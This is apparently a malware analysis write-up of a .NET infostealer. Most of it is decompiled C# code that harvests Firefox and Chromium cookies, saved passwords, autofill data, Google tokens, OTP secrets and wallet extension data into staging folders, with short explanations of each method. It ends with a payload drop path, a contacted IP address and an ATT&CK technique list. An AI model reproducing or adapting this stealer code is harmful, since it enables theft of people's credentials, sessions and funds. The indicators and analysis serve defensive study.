"gabedfkgnbglfbnplfpjddgfnbibkmbb|LastPass",
"ocglkepbibnalbgmbachknglpdipeoio|Edge_Authenticator"In the NexuiVzyat function:
using System;
using System.Collections.Generic;
using System.IO;
namespace Ishimsky
{
// Token: 0x0200000A RID: 10
internal class NexuiVzyat
{
// Token: 0x0600001A RID: 26 RVA: 0x00003338 File Offset: 0x00001538
public static List<string> Goryachy(List<string> paths)
{
List<string> result = new List<string>();
try
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile);
foreach (string text in paths)
{
try
{
foreach (string text2 in FilveM.DirTester(text.Replace("%PAPAGEY%", folderPath), new string[]
{
"cookies.sqlite"
}))
{
string fullName = new FileInfo(text2).Directory.FullName;
string text3 = text2.Contains(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)) ? NexuiVzyat.FRX1(fullName) : NexuiVzyat.FRX2(fullName);
bool flag = !string.IsNullOrEmpty(text3);
bool flag2 = flag;
if (flag2)
{
FiveW.Cliator(string.Concat(new string[]
{
ModelGeev.patriarh,
"/Cookies/[Geko]",
text3,
"_",
new DirectoryInfo(fullName).Name,
".txt"
}), "cookieold|null", NexuiVzyat.FRXCookiesByProfile(fullName));
}
}
}
catch
{
}
}
}
catch (Exception)
{
}
return result;
}
// Token: 0x0600001B RID: 27 RVA: 0x000034F8 File Offset: 0x000016F8
private static List<string> FRXCookiesByProfile(string prf)
{
List<string> list = new List<string>();
try
{
string text = Path.Combine(prf, "cookies.sqlite");
bool flag = !File.Exists(text);
if (flag)
{
return list;
}
Ridik ridik = new Ridik(text);
ridik.ReadContextTable("moz_cookies");
int i = 0;
while (i < ridik.RowLength)
{
string text2 = null;
try
{
text2 = string.Concat(new string[]
{
ridik.ReadContextValue(i, 4).Trim(),
"\t",
(ridik.ReadContextValue(i, 4).Trim()[0] == '.').ToString(),
"\t",
ridik.ReadContextValue(i, 5).Trim(),
"\t",
(ridik.ReadContextValue(i, 9)[0] == '1').ToString(),
"\t",
ridik.ReadContextValue(i, 6).Trim(),
"\t",
ridik.ReadContextValue(i, 2).Trim(),
"\t",
ridik.ReadContextValue(i, 3)
});
}
catch
{
}
i++;
bool flag2 = text2 != null;
if (flag2)
{
list.Add(text2);
}
}
}
catch
{
}
ModelGeev.c += list.Count;
return list;
}
// Token: 0x0600001C RID: 28 RVA: 0x000036A8 File Offset: 0x000018A8
public static string FRX1(string pfd)
{
string result = string.Empty;
try
{
pfd = pfd.Replace(Environment.ExpandEnvironmentVariables("%appdata%\\"), string.Empty);
string[] array = pfd.Split(new char[]
{
'\\'
}, StringSplitOptions.RemoveEmptyEntries);
bool flag = array[2] == "Profiles";
bool flag2 = flag;
if (flag2)
{
result = array[1];
}
else
{
result = array[0];
}
}
catch
{
}
return result;
}
// Token: 0x0600001D RID: 29 RVA: 0x00003728 File Offset: 0x00001928
public static string FRX2(string pfd)
{
string result = string.Empty;
try
{
pfd = pfd.Replace(Environment.ExpandEnvironmentVariables("%localappdata%\\"), string.Empty);
string[] array = pfd.Split(new char[]
{
'\\'
}, StringSplitOptions.RemoveEmptyEntries);
bool flag = array[2] == "Profiles";
bool flag2 = flag;
if (flag2)
{
result = array[1];
}
else
{
result = array[0];
}
}
catch
{
}
return result;
}
}
}GoryachyMethod:
- Accepts a list of paths, and checks for
cookies.sqlitefiles in those paths, and processes them to extract cookie information. - It constructs file names for storing cookie data based on the profile’s directory and writes the cookie information to text files.
FRXCookiesByProfileMethod:
- Reads the
cookies.sqlitefile associated with a browser profile and extracts cookie details from themoz_cookiestable. - Compiles the cookie data into a list of strings formatted with various attributes (e.g., domain, path, expiration).
FRXandFRX2Methods:
- These methods process file paths to derive the profile name based on whether the path points to the AppData or LocalAppData directory.
- They help identify whether the path relates to a specific browser profile or a different directory structure.
The class is designed to collect and organize cookie data from different browsers, handling potential exceptions to ensure robustness.
In this gathering function, the stealer collects data from various applications, likely within a Windows environment. The code has several functions with names in a mix of English and what seems to be a Slavic language.
using System;
using System.Collections.Generic;
using System.IO;
using System.Text;
using System.Threading;
namespace Ishimsky
{
// Token: 0x02000008 RID: 8
internal class Nurminsky
{
// Token: 0x06000011 RID: 17 RVA: 0x0000272C File Offset: 0x0000092C
public static string RandomName(int NameLength)
{
StringBuilder stringBuilder = new StringBuilder();
Random random = new Random((int)DateTime.Now.Ticks);
while (0 < NameLength--)
{
string text = "abcdefghijklmnopqrstuvwxyz";
stringBuilder.Append(text[random.Next(text.Length)]);
Thread.Sleep(1);
}
return stringBuilder.ToString();
}
// Token: 0x06000012 RID: 18 RVA: 0x0000279C File Offset: 0x0000099C
public static string Mumia()
{
List<string> p = Blizkiy.MOS("SELECT * FROM Win32_Processor", "Name", "NumberOfCores", "Cores - ");
List<string> g = Blizkiy.MOS2("root\\CIMV2|SELECT * FROM Win32_VideoController", "AdapterRAM", "Name");
FiveW.SINF(ModelGeev.patriarh + "\\INFS.txt", "sinf|null", g, p);
return "Bolshoi Brat";
}
// Token: 0x06000013 RID: 19 RVA: 0x00002800 File Offset: 0x00000A00
public static string TraxBabax()
{
Directory.CreateDirectory(ModelGeev.patriarh + "\\");
Directory.CreateDirectory(ModelGeev.patriarh + "\\Wallets");
Directory.CreateDirectory(ModelGeev.patriarh + "\\Cookies");
Directory.CreateDirectory(ModelGeev.patriarh + "\\Restore");
Directory.CreateDirectory(ModelGeev.patriarh + "\\Autofill");
return "GolovnoyOtdel";
}
// Token: 0x06000014 RID: 20 RVA: 0x00002880 File Offset: 0x00000A80
public static string Dalma(string profilePath)
{
string text = string.Empty;
try
{
List<string> list = FilveM.LocTester(profilePath, new string[]
{
"Local State",
"LocalPrefs.json"
});
foreach (string path in list)
{
bool flag = File.Exists(path);
if (flag)
{
try
{
string text2 = File.ReadAllText(path);
bool flag2 = !string.IsNullOrEmpty(text2);
if (flag2)
{
text = FiveW.RGX(text2, "\"encrypted_key\":\"", "\"");
bool flag3 = !string.IsNullOrEmpty(text);
if (flag3)
{
return text;
}
}
}
catch (Exception)
{
}
}
}
}
catch
{
}
return text;
}
// Token: 0x06000015 RID: 21 RVA: 0x00002970 File Offset: 0x00000B70
public static List<string> Anpelgolds(IList<string> pfs)
{
List<string> list = new List<string>();
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile);
foreach (string text in pfs)
{
try
{
foreach (string text2 in FilveM.DirTester(text.Replace("%PAPAGEY%", folderPath), new string[]
{
"Login Data",
"Web Data",
"Cookies"
}))
{
string text3 = string.Empty;
string fullName = new FileInfo(text2).Directory.FullName;
bool flag = fullName.Contains("Opera GX Stable");
bool flag2 = flag;
if (flag2)
{
text3 = "Opera GX Stable";
}
else
{
text3 = (text2.Contains("Roaming") ? FilveM.ChrRm(fullName) : FilveM.ChrLm(fullName));
}
text3 = text3[0].ToString().ToUpper() + text3.Remove(0, 1);
string str = FilveM.CGN(fullName);
text3 = text3 + "_" + str;
string text4 = Nurminsky.Dalma(text.Replace("%PAPAGEY%", folderPath));
string text5 = Nurminsky.RandomName(8);
Directory.CreateDirectory(ModelGeev.patriarh + "\\" + text3);
string text6 = Path.Combine(ModelGeev.patriarh + "\\", text3);
string text7 = Nurminsky.RandomName(8);
bool flag3 = text2.Contains("Login Data");
if (flag3)
{
byte[] bytes = File.ReadAllBytes(text2);
File.WriteAllBytes(text6 + "\\" + text7 + ".loda", bytes);
list.Add(string.Concat(new string[]
{
text6,
"\\",
text7,
".loda|",
text3,
"|",
text4,
"|",
fullName
}));
}
else
{
bool flag4 = text2.Contains("Web Data");
if (flag4)
{
byte[] bytes2 = File.ReadAllBytes(text2);
File.WriteAllBytes(text6 + "\\" + text7 + ".weda", bytes2);
list.Add(string.Concat(new string[]
{
text6,
"\\",
text7,
".weda|",
text3,
"|",
text4,
"|",
fullName
}));
}
else
{
bool flag5 = text2.Contains("Cookies");
if (flag5)
{
byte[] bytes3 = File.ReadAllBytes(text2);
File.WriteAllBytes(text6 + "\\" + text7 + ".coco", bytes3);
list.Add(string.Concat(new string[]
{
text6,
"\\",
text7,
".coco|",
text3,
"|",
text4,
"|",
fullName
}));
}
}
}
}
}
catch
{
}
}
return list;
}
// Token: 0x06000016 RID: 22 RVA: 0x00002D00 File Offset: 0x00000F00
public static string OblaGlobal(IList<string> list)
{
foreach (string text in list)
{
string[] array = text.Split(new char[]
{
'|'
});
bool flag = File.Exists(array[0]);
if (flag)
{
string fullName = new FileInfo(array[0]).Directory.FullName;
Directory.Delete(fullName, true);
}
}
return "TERQA";
}
// Token: 0x06000017 RID: 23 RVA: 0x00002D90 File Offset: 0x00000F90
public static string Armyanec01(IList<string> list)
{
try
{
List<string> list2 = new List<string>();
foreach (string text in list)
{
List<string> list3 = new List<string>();
List<string> list4 = new List<string>();
List<string> list5 = new List<string>();
List<string> list6 = new List<string>();
List<string> list7 = new List<string>();
string[] array = text.Split(new char[]
{
'|'
});
List<string> list8 = Bulkonit.Cerulecus(array[3]);
List<string> list9 = Bulkonit.CORMAGIDON(array[3]);
bool flag = array[0].Contains(".coco");
if (flag)
{
list3 = Bulkonit.DaritMolodost(array[0], array[2]).Item1;
list4 = Bulkonit.DaritMolodost(array[0], array[2]).Item2;
}
else
{
bool flag2 = array[0].Contains(".weda");
if (flag2)
{
bool flag3 = !array[1].ToLower().Contains("microsoft");
if (flag3)
{
list5 = Bulkonit.CaptuToto(array[0], array[2]);
}
list6 = Bulkonit.Pidofilio(array[0], array[2]);
}
else
{
bool flag4 = array[0].Contains(".loda");
if (flag4)
{
list7 = Bulkonit.Chapap(array[0], array[2]);
}
}
}
ModelGeev.c += list3.Count;
ModelGeev.p += list7.Count;
ModelGeev.a += list6.Count;
ModelGeev.t += list5.Count;
ModelGeev.e += list8.Count;
ModelGeev.o += list9.Count;
Nurminsky.sosok++;
ModelGeev.Rukavica = string.Concat(new string[]
{
ModelGeev.c.ToString(),
"|",
ModelGeev.p.ToString(),
"|",
ModelGeev.t.ToString(),
"|",
ModelGeev.a.ToString(),
"|",
ModelGeev.e.ToString(),
"|",
ModelGeev.o.ToString()
});
bool flag5 = list7.Count >= 1;
if (flag5)
{
FiveW.Cliator(ModelGeev.patriarh + "\\AllPws.txt", "pwd|" + array[1], list7);
}
bool flag6 = list3.Count >= 1;
if (flag6)
{
FiveW.Cliator(string.Concat(new string[]
{
ModelGeev.patriarh,
"\\Cookies\\",
array[1],
"[",
Nurminsky.sosok.ToString(),
"].txt"
}), "cookieold|null", list3);
}
bool flag7 = list4.Count >= 1;
if (flag7)
{
FiveW.Cliator(string.Concat(new string[]
{
ModelGeev.patriarh,
"\\Cookies\\",
array[1],
"[",
Nurminsky.sosok.ToString(),
"] FOR LINKING YT.txt"
}), "cookieold|null", list4);
}
bool flag8 = list6.Count >= 1;
if (flag8)
{
FiveW.Cliator(string.Concat(new string[]
{
ModelGeev.patriarh,
"\\Autofill\\[Extension]",
array[1],
"[",
Nurminsky.sosok.ToString(),
"].txt"
}), "autofill|null", list6);
}
bool flag9 = list5.Count >= 1;
if (flag9)
{
FiveW.Cliator(ModelGeev.patriarh + "\\Restore\\[%GoogleID%]" + array[1] + ".txt", "gtoken|null", list5);
}
bool flag10 = list9.Count >= 1;
if (flag10)
{
FiveW.Cliator(ModelGeev.patriarh + "\\OTP " + array[1] + ".txt", "otp|null", list9);
}
bool flag11 = list8.Count >= 1;
if (flag11)
{
FiveW.Wariator(ModelGeev.patriarh + "\\Wallets\\", "ext|" + array[1], list8);
}
}
}
catch
{
}
try
{
bool flag12 = string.IsNullOrEmpty(ModelGeev.Rukavica);
if (flag12)
{
ModelGeev.Rukavica = "0|0|0|0|0|0";
}
Nurminsky.Mumia();
}
catch
{
}
return "You Not Last Actual Version";
}
// Token: 0x04000007 RID: 7
private static int sosok;
}
}RandomName(int NameLength):- Generates a random string of lowercase letters with a specified length.
- Uses a
StringBuilderfor efficiency, and includes aThread.Sleep(1)to ensure varied results based on timing. Mumia():- Interacts with Windows Management Instrumentation (WMI) to gather processor and video controller information.
- It appears to save this information to a file (though the implementation of
FiveW.SINFis not provided). TraxBabax():- Creates several directories under a specified path (
ModelGeev.patriarh), which likely serves as a data storage or workspace location. Dalma(string profilePath):- Reads specific files from a given profile path to extract an “encrypted key” from JSON content.
Anpelgolds(IList<string> pfs):- Processes a list of paths to locate and handle data files (like “Login Data”, “Web Data”, and “Cookies”) across different browsers.
- Saves the contents into new files with different extensions based on their types.
OblaGlobal(IList<string> list):- Deletes directories associated with the paths specified in the list, indicating a cleanup function.
Armyanec01(IList<string> list):- This function handles the processing of gathered data, categorizing them based on their type and saving them to specific files based on the data type.
- It also collects statistics about the number of items processed
the stealer drops the payload in this path:
C:\Users\Admin\AppData\Local\Temp\download.exe
Contacted IP Address:
104.21.52.67
PORT: 443
ATT&CK:
Execution:
Windows Management Instrumentation T1047
access WMI data in .NET
Defense Evasion:
Obfuscated Files or Information T1027
encrypt data using DPAPI
encrypt or decrypt data via BCrypt
encode data using Base64
Deobfuscate/Decode Files or Information T1140
decode data using Base64 in .NET
Discovery:
System Information Discovery T1082
get OS version in .NET
get number of processor cores
query environment variable
get hostname
File and Directory Discovery T1083
check if the file exists
get the common file path
check if the directory exists
enumerate files on Windows
Process Discovery T1057
enumerate processes
find the process by name
Software Discovery T1518
enumerate processes
Collection:
Data from Information Repositories T1213
reference WMI statements
